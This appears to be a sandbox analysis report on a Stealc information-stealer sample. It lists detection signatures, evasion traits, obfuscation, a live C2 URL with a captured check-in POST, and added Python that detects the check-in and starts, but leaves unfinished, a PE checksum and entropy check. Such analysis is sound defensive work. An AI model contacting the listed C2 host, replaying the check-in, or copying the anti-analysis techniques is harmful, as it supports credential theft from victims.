Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544952
MD5: 31c844530d857c4266248543c40284cc
SHA1: 97f7aae6867695e025abdc5e1a7d446d7c5b875f
SHA256: 81ccbbfcfd5e8991632a16d6b4d28b36ef74409773b3e5622cf58cf43638ce07
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 31C844530D857C4266248543C40284CC)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers (sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll). It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2131533461.00000000052D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6644 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6644 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.ba0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T22:13:18.983215+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.ba0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAA2B0 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2131533461.00000000052FB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2131533461.00000000052FB000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BADB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BAEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BABE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BADF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /6c4adf523b719729.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 42 42 35 43 31 32 46 35 37 35 33 37 39 39 36 32 31 31 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a
    Data Ascii:
    ------FHCGCFHDHIIIDGCAAEGD
    Content-Disposition: form-data; name="hwid"

    6BBB5C12F5753799621165
    ------FHCGCFHDHIIIDGCAAEGD
    Content-Disposition: form-data; name="build"

    tale
    ------FHCGCFHDHIIIDGCAAEGD--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BA62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2176326944.000000000134A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.
Source: file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/2
Source: file.exe, 00000000.00000002.2176326944.000000000134A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php3
Source: file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/:U
Source: file.exe, file.exe, 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2131533461.00000000052FB000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
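The check-in captured above carries exactly two form fields, hwid and build, in a multipart POST to a .php path with no User-Agent header; that combination is what the Suricata signature and the "HTTP GET or POST without a user agent" finding key on. The Python below is an added example, not code from the Joe Sandbox report or from Stealc, that parses a raw request of that shape and scores it on those traits. The check-in bytes are reconstructed from the capture above (same path, headers and 211-byte body), the browser upload is a constructed control case, and the trait names and thresholds (for instance an upper-case hex hwid of at least 16 characters) are this example's own assumptions rather than anything the report states.

```python
import re

# Constructed for this example from the capture above: the check-in POST, byte for byte
# (same path, headers and 211-byte multipart body, and no User-Agent header).
STEALC_CHECKIN = (
    b"POST /6c4adf523b719729.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------FHCGCFHDHIIIDGCAAEGD\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"6BBB5C12F5753799621165\r\n"
    b"------FHCGCFHDHIIIDGCAAEGD\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"tale\r\n"
    b"------FHCGCFHDHIIIDGCAAEGD--\r\n"
)

# Constructed control case: an ordinary browser file upload (has a User-Agent, one file field).
BROWSER_UPLOAD = (
    b"POST /upload.php HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: multipart/form-data; boundary=xyz\r\n"
    b"Content-Length: 88\r\n"
    b"\r\n"
    b"--xyz\r\n"
    b'Content-Disposition: form-data; name="file"; filename="a.txt"\r\n'
    b"\r\n"
    b"hello\r\n"
    b"--xyz--\r\n"
)


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body); header names are lower-cased."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("request has no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Return {field name: raw value} for a multipart/form-data body (RFC 7578 framing)."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(1).encode("latin-1")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):                 # closing delimiter: --boundary--
            break
        part_headers, _, value = part[2:].partition(b"\r\n\r\n")   # skip the CRLF after the delimiter
        name = re.search(rb'(?<![a-z])name="([^"]*)"', part_headers)  # not the filename= parameter
        if name is None:
            raise ValueError("part without a field name")
        fields[name.group(1).decode("latin-1")] = value[:-2]      # drop the CRLF before the next delimiter
    return fields


def classify_checkin(raw: bytes) -> dict:
    """Score a request against the traits of the check-in captured above (trait set is this example's choice)."""
    method, path, headers, body = parse_http_request(raw)
    ctype = headers.get("content-type", "")
    fields = parse_multipart(body, ctype) if ctype.startswith("multipart/form-data") else {}
    traits = {
        "post_to_php": method == "POST" and path.lower().endswith(".php"),
        "no_user_agent": "user-agent" not in headers,
        "length_matches": int(headers.get("content-length", -1)) == len(body),
        "hwid_and_build_only": set(fields) == {"hwid", "build"},
        "hwid_is_upper_hex": re.fullmatch(rb"[0-9A-F]{16,}", fields.get("hwid", b"")) is not None,
    }
    return {
        "fields": {k: v.decode("latin-1") for k, v in fields.items()},
        "traits": traits,
        "is_stealc_checkin": all(traits.values()),
    }


if __name__ == "__main__":
    for label, request in (("stealc", STEALC_CHECKIN), ("browser", BROWSER_UPLOAD)):
        print(label, classify_checkin(request))
```

The parser deliberately keeps the body as bytes and checks Content-Length against what was actually received, so a truncated capture or a proxy that re-chunked the request does not silently pass as a match; the hwid/build field-set check is the trait that separates this check-in from ordinary form uploads, and the remaining traits only raise confidence.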

                System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE0098
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC41EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFB198
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD2138
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE4288
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0E258
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0C3DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1D39E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C2B308
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010CE2EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF04BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE45A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0D5A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BC4573
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCE544
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F9B6CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C296FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE66C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1A648
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF4639
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C16799
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FED779
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFD720
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF98B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0F8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFB8A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF4868
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF8993
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E98939
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FEBA94
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C08BD9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C10B88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C14BA8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F84B2A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C1AC28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF5DB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BF4DC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD1D78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC1D37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF5D2C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BFBD68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0AD38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C11EE8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF6E94
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BE8E78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FF1F29
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00BA4610 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: fvvfrivq ZLIB complexity 0.9949130575525664
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\IN2L35LD.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2094592 > 1048576
Source: file.exe | Static PE information: Raw size of fvvfrivq is bigger than: 0x100000 < 0x194400

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ba0000.0.unpack
    section rights in memory: (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; fvvfrivq:EW; fjsconsa:EW; .taggant:EW
    vs. on disk:              (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; fvvfrivq:EW; fjsconsa:EW; .taggant:EW
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x200375 should be: 0x20d163
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: fvvfrivq
Source: file.exe | Static PE information: section name: fjsconsa
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010BA108 push 321921FEh; mov dword ptr [esp], esi (instruction at 0_2_010BA14B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107A117 push 02A8F92Dh; mov dword ptr [esp], edx (instruction at 0_2_0107A18E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCA0F2 push eax; retf (instruction at 0_2_00BCA119)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BCA0DC push eax; retf (instruction at 0_2_00BCA0F1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01067165 push ebp; mov dword ptr [esp], edi (instruction at 0_2_01067194)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01065181 push 1B6DE272h; mov dword ptr [esp], edx (instruction at 0_2_0106518F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8B051 push edi; mov dword ptr [esp], ebp (instruction at 0_2_00F8B08A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8B051 push ecx; mov dword ptr [esp], edx (instruction at 0_2_00F8B0C5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8B051 push 12F6A33Ch; mov dword ptr [esp], edx (instruction at 0_2_00F8B0FE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8B051 push 67A49EB6h; mov dword ptr [esp], ebx (instruction at 0_2_00F8B127)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC41EC push eax; mov dword ptr [esp], ebx (instruction at 0_2_00FC41F0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC41EC push 3C93E391h; mov dword ptr [esp], eax (instruction at 0_2_00FC422C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC41EC push esi; mov dword ptr [esp], edi (instruction at 0_2_00FC4238)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC41EC push eax; mov dword ptr [esp], ebp (instruction at 0_2_00FC42CD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01096010 push 2D374D35h; mov dword ptr [esp], ecx (instruction at 0_2_01096089)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01099028 push 1E3B3646h; mov dword ptr [esp], ebp (instruction at 0_2_01099082)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0108F03D push 138BEB52h; mov dword ptr [esp], edi (instruction at 0_2_0108F08B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010FC034 push esi; mov dword ptr [esp], 381528BDh (instruction at 0_2_010FC09D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107E038 push 4CCBEA85h; mov dword ptr [esp], ebx (instruction at 0_2_0107E047)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107E038 push 5A609B12h; mov dword ptr [esp], ecx (instruction at 0_2_0107E0FD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107E038 push 6ECB3A68h; mov dword ptr [esp], esi (instruction at 0_2_0107E169)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107E038 push esi; mov dword ptr [esp], edx (instruction at 0_2_0107E177)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107E038 push eax; mov dword ptr [esp], 6F5F1B81h (instruction at 0_2_0107E1A2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107E038 push 5AD73E99h; mov dword ptr [esp], edi (instruction at 0_2_0107E1E0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107E038 push eax; mov dword ptr [esp], esi (instruction at 0_2_0107E1FB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0101806A push ebp; mov dword ptr [esp], esi (instruction at 0_2_010180AB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0101806A push edi; mov dword ptr [esp], esp (instruction at 0_2_0101811A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106B06D push 22C2893Dh; mov dword ptr [esp], edx (instruction at 0_2_0106B0EC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0106B06D push ebp; mov dword ptr [esp], edi (instruction at 0_2_0106B117)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010D5066 push 2058CE04h; mov dword ptr [esp], ebx (instruction at 0_2_010D5033)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010D5066 push 295712A7h; mov dword ptr [esp], esp (instruction at 0_2_010D503B)
Source: file.exe | Static PE information: section name: fvvfrivq entropy: 7.9536048042194505
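The static findings in this section (stored checksum 0x200375 against an expected 0x20d163, section fvvfrivq at entropy 7.95 and ZLIB complexity 0.99, the entry point inside .taggant, and unnamed or randomly named sections that are both writable and executable) are all computable from the file on disk before it is ever run. The Python below is an added example, not the sandbox's own code, that recomputes the PE header checksum with the documented algorithm (a 32-bit sum over every dword except the CheckSum field, carries folded back in, folded to 16 bits, plus the file length), walks the section table and reports per-section entropy, compressibility and W+X rights. Because the sample itself is not reproduced here, it runs over a constructed minimal PE32 header whose single section is named fvvfrivq and filled with every byte value once; that stand-in, the 7.0 entropy threshold and the field names in the returned dict are this example's assumptions.

```python
import math
import struct
import zlib

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def checksum_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 4 (PE sig) + 20 (COFF) + 64."""
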